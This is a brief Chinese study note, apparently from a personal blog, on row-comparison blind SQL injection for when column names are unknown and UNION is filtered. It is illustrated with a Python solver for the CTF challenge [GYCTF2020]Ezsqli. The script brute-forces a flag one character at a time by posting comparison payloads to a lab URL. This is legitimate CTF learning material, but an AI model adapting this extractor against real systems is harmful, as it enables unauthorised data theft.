位偏移注入 - 个人学习和生活点滴记录 -

0x01[使用场景]

知道表名，但是不知道列名
union被过滤，导致常见的无列名注入无法使用

0x02[原理解释]

如果列数不相同，会报错

0x03[例题示例]

[GYCTF2020]Ezsqli

import requests
import time

proxies = {
    "http": "",
    "https": "",
}

url = 'http://4e6cb1dc-496c-4505-9ae9-747de7b583d0.node4.buuoj.cn:81/index.php'

list = [45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125]

database = ''
flag = ''

for i in range(50):
    for j in list:
        flag = database+chr(j)
        print(flag)
        data = {'id': "0^((select 1,'{}')>(select * from f1ag_1s_h3r3_hhhhh))".format(flag)}
        print(data)
        res = requests.post(url=url, proxies=proxies, data=data)
        if 'Nu1L' in res.text:
            database += chr(j-1)
            flag = ''
            break
        time.sleep(0.5)